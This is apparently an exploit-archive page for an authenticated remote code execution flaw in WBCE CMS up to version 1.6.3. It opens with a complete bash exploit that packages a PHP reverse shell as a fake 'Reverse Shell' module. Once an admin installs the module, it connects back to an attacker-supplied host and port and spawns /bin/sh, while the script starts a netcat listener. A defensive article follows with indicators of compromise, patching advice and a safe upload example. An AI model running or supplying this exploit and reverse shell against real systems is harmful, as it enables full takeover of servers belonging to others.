WBCE CMS 1.6.3 - Authenticated Remote Code Execution (RCE)

Exploit Author: Swammers8 Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Shell Published Date: 2025-04-06 
# Exploit Title: WBCE CMS <= v1.6.3 Authenticated Remote Code Execution (RCE)
# Date: 3/22/2025
# Exploit Author: Swammers8
# Vendor Homepage: https://wbce-cms.org/
# Software Link: https://github.com/WBCE/WBCE_CMS
# Version: 1.6.3 and prior
# Tested on: Ubuntu 24.04.2 LTS
# YouTube Demonstration: https://youtu.be/Dhg5gRe9Dzs?si=-WQoiWU1yqvYNz1e
# Github: https://github.com/Swammers8/WBCE-v1.6.3-Authenticated-RCE

#!/bin/bash

# Make a zip file exploit
# Start netcat listener

if [[ $# -ne 2 ]]; then
echo "[*] Description:"
echo "[*] This is an Authenticated RCE exploit for WBCE CMS version <= 1.6.3"
echo "[*] It will create an infected module .zip file and start a netcat listener."
echo "[*] Once the zip is created, you will have to login to the admin page"
echo "[*] to upload and install the module, which will immediately run the shell"
echo "[*] Shell taken from: https://github.com/pentestmonkey/php-reverse-shell/tree/master"
echo "[!] Usage:"
echo "[*] $0 <lhost> <lport>"
exit 1
fi

if [ -z "$(which nc)" ]; then
echo "[!] Netcat is not installed."
exit 1 
fi

ip=$1
port=$2

rm -rf shellModule.zip
rm -rf shellModule
mkdir shellModule

echo [*] Crafting Payload

cat <<EOF > shellModule/info.php
<?php
/**
 *
 * @category        modules
 * @package         Reverse Shell
 * @author          Swammers8
 * @link                        https://swammers8.github.io/
 * @license         http://www.gnu.org/licenses/gpl.html
 * @platform        example.com
 * @requirements    PHP 5.6 and higher
 * @version         1.3.3.7
 * @lastmodified    May 22 2025
 *
 *
 */
\$module_directory               = 'modshell';
\$module_name                    = 'Reverse Shell';
\$module_function                = 'page';
\$module_version                 = '1.3.3.7';
\$module_platform                = '2.10.x';

\$module_author                  = 'Swammers8';
\$module_license                 = 'GNU General Public License';
\$module_description     = 'This module is a backdoor';

?>
EOF

cat <<EOF > shellModule/install.php
<?php
set_time_limit (0);
\$VERSION = "1.0";
\$ip = '$ip';  // CHANGE THIS
\$port = $port;       // CHANGE THIS
\$chunk_size = 1400;
\$write_a = null;
\$error_a = null;
\$shell = 'uname -a; w; id; /bin/sh -i';
\$daemon = 0;
\$debug = 0;

if (function_exists('pcntl_fork')) {
\$pid = pcntl_fork();
if (\$pid == -1) {
printit("ERROR: Can't fork");
exit(1);
}

if (\$pid) {
exit(0);  // Parent exits
}

if (posix_setsid() == -1) {
printit("Error: Can't setsid()");
exit(1);
}

\$daemon = 1;
} else {
printit("WARNING: Failed to daemonise.  This is quite common and not fatal.");
}

chdir("/");

umask(0);


\$sock = fsockopen(\$ip, \$port, \$errno, \$errstr, 30);
if (!\$sock) {
printit("\$errstr (\$errno)");
exit(1);
}

\$descriptorspec = array(
   0 => array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
);

\$process = proc_open(\$shell, \$descriptorspec, \$pipes);

if (!is_resource(\$process)) {
printit("ERROR: Can't spawn shell");
exit(1);
}

stream_set_blocking(\$pipes[0], 0);
stream_set_blocking(\$pipes[1], 0);
stream_set_blocking(\$pipes[2], 0);
stream_set_blocking(\$sock, 0);

printit("Successfully opened reverse shell to \$ip:\$port");

while (1) {
if (feof(\$sock)) {
printit("ERROR: Shell connection terminated");
break;
}

if (feof(\$pipes[1])) {
printit("ERROR: Shell process terminated");
break;
}

\$read_a = array(\$sock, \$pipes[1], \$pipes[2]);
\$num_changed_sockets = stream_select(\$read_a, \$write_a, \$error_a, null);

if (in_array(\$sock, \$read_a)) {
if (\$debug) printit("SOCK READ");
\$input = fread(\$sock, \$chunk_size);
if (\$debug) printit("SOCK: \$input");
fwrite(\$pipes[0], \$input);
}

if (in_array(\$pipes[1], \$read_a)) {
if (\$debug) printit("STDOUT READ");
\$input = fread(\$pipes[1], \$chunk_size);
if (\$debug) printit("STDOUT: \$input");
fwrite(\$sock, \$input);
}

if (in_array(\$pipes[2], \$read_a)) {
if (\$debug) printit("STDERR READ");
\$input = fread(\$pipes[2], \$chunk_size);
if (\$debug) printit("STDERR: \$input");
fwrite(\$sock, \$input);
}
}

fclose(\$sock);
fclose(\$pipes[0]);
fclose(\$pipes[1]);
fclose(\$pipes[2]);
proc_close(\$process);

function printit (\$string) {
if (!\$daemon) {
print "\$string\n";
}
}

?> 
EOF

echo [*] Zipping to shellModule.zip
zip -r shellModule.zip shellModule
rm -rf shellModule
echo [*] Please login to the WBCE admin panel to upload and install the module
echo [*] Starting listener

nc -lvnp $port

echo
echo
echo "[*] Done!"
echo "[*] Make sure to uninstall the module named 'Reverse Shell' in the module page"


WBCE CMS 1.6.3 — Authenticated Remote Code Execution (RCE): Analysis, Detection, and Remediation

This article explains the nature, impact, detection strategies, and remediation for an authenticated remote code execution (RCE) weakness affecting WBCE CMS versions up to 1.6.3. It summarizes the underlying causes at a high level, shows secure coding and configuration mitigations, and provides practical defensive measures — without providing exploit construction or step-by-step attack instructions.

Summary and Risk

An authenticated RCE in a content-management system like WBCE allows a user with valid administrative credentials to upload or install a module that contains executable server-side code. If the CMS performs insufficient validation or executes installer scripts directly, that capability can be abused to achieve arbitrary code execution on the host. The vulnerability is high-risk because it combines a low barrier (need only valid admin access) with a severe outcome (full server compromise).

  • Affected: WBCE CMS ≤ 1.6.3 (per public advisories and proof-of-concept reports).
  • Attack vector: Authenticated module upload/install leading to execution of uploaded PHP code.
  • Impact: Remote code execution, data exfiltration, persistence, lateral movement, and site defacement.
  • Exploitability: Requires administrative login (credentials) but no need for other preconditions if module install executes arbitrary PHP.

Root Causes (High-Level)

  • Lack of strict validation of uploaded module archives (allowing arbitrary PHP files inside).
  • Installer processes that execute or include files from uploaded modules without safe sandboxing.
  • File/permission configuration allowing web server to execute files in upload/extension directories.
  • Insufficient separation between administrative actions and code execution contexts.

Detection & Incident Response

Indicators of Compromise (IoCs)

  • New or unexpected module folders under the CMS modules directory (e.g., oddly named modules added near the timeframe of suspicious admin activity).
  • Install-time execution messages in web server logs or application logs referencing module installation scripts.
  • Outbound network connections from the web server to uncommon remote IPs and ports (reverse shell callbacks, persistent beacons).
  • Creation of web shells or PHP files that contain unusual code patterns such as base64_decode + eval, proc_open/exec/fopen to remote sockets.

Log and Host Hunting Recipes (Safe, High-Level)

Search for abnormal admin activity and anomalous outbound connections. Example high-level queries you can adapt to your tooling:

  • Web server access logs: unexpected POST requests to module upload or admin endpoints, especially outside normal maintenance windows.
  • Authentication logs: successful admin logins from unfamiliar IP addresses or at unusual times.
  • Network monitoring: new persistent outbound TCP connections from the web server to non-standard ports or to IPs with low reputation.
  • File integrity monitoring: detection of recently created/modified PHP files in module or upload directories.

Remediation and Hardening

Immediate Actions

  • If compromise is suspected, isolate the host from the network (segregate but preserve evidence) and collect logs and filesystem snapshots for forensic analysis.
  • Rotate administrative credentials and any credentials accessible from the web application (database, API keys) — only after isolating and ensuring backups are secure.
  • Apply vendor-supplied patches or upgrade to the fixed version of WBCE immediately.
  • Scan for unexpected files and outbound connections described in IoCs and remove malicious artifacts only after evidence collection if performing incident response.

Long-Term Fixes and Best Practices

  • Apply the vendor patch or upgrade to a version that addresses module installation logic and upload validation.
  • Enforce least privilege: run the web server with the minimum privileges needed and ensure upload directories are not executable by the web server process.
  • Implement multi-factor authentication (MFA) for admin accounts to reduce the risk from credential compromise.
  • Use allowlists for file types and perform content inspection; never execute uploaded code directly.
  • Enable file integrity monitoring (FIM) and alerting for changes to application directories.
  • Deploy a web application firewall (WAF) with rules that block suspicious upload patterns and known attacker payloads.

Secure Design Example — Safe File Upload Pattern (PHP)

// High-level secure upload handler (illustrative only)
$allowedExtensions = ['zip'];
$maxSizeBytes = 10 * 1024 * 1024; // 10 MB

// Validate file metadata
if (!isset($_FILES['module']) || $_FILES['module']['error'] !== UPLOAD_ERR_OK) {
    throw new Exception('Upload failed');
}
if ($_FILES['module']['size'] > $maxSizeBytes) {
    throw new Exception('File too large');
}
$ext = strtolower(pathinfo($_FILES['module']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowedExtensions, true)) {
    throw new Exception('Invalid file type');
}

// Store uploaded archive outside webroot
$storagePath = '/var/www/wbce_uploads/modules/';
$safeName = bin2hex(random_bytes(16)) . '.zip';
move_uploaded_file($_FILES['module']['tmp_name'], $storagePath . $safeName);

// Inspect the archive server-side in a controlled, read-only context
// - Extract to a temporary, non-executable directory
// - Verify manifest files and allowed filenames only
// - Reject if any .php or executable files are present in the module package

Explanation: This snippet demonstrates a defensive upload flow: strict extension checks, size limits, storing uploads outside webroot, randomized filenames, and the recommendation to extract and inspect archives in a non-executable, temporary directory. Crucially, it avoids executing any code found in uploaded archives. During the extraction/inspection phase, policies should forbid PHP or binary files unless the module model explicitly and safely supports them.

Filesystem and Permissions

  • Make upload and extraction directories non-executable (no PHP execution). Use OS-level permissions and web server configuration (e.g., disable PHP parsing with a separate vhost or .htaccess where applicable).
  • Separate code and uploaded content: keep user-contributed modules in a path that is not included by the application at runtime until vetted and approved.

WAF and Network-Level Mitigations

While you fix application-level issues, deploy network and perimeter controls:

  • Block known malicious IPs and suspicious outbound ports at the firewall.
  • Create WAF rules that detect uploads with dangerous file types inside archives and that block suspicious admin workflow automation patterns.
  • Rate-limit admin endpoints and enforce additional authentication for module installation actions.

Responsible Testing and Disclosure

Security researchers and administrators should:

  • Test fixes and reproduce behavior only in isolated, legally authorized lab environments (virtual machines or containers that mirror production but hold no sensitive data).
  • Follow responsible disclosure: coordinate with the vendor, give time for fixes, and publish details only after mitigations are available.
  • Engage forensic expertise if a production compromise is suspected.

References & Further Reading

ResourcePurpose
WBCE CMS official siteVendor information, downloads, and security advisories
WBCE project on GitHubSource code and issue tracking (use to confirm patched revisions)
OWASP Secure File Upload Cheat SheetGuidance on safe upload handling and hardening
Application security blogs and advisoriesContext on RCE risks and defensive patterns

Remediation prioritization: if you operate WBCE 1.6.3 or earlier, treat this as a high-priority patching item. Combine immediate protective controls (isolation, MFA, network controls, file permission changes) with a long-term code and architecture review to prevent similar issues.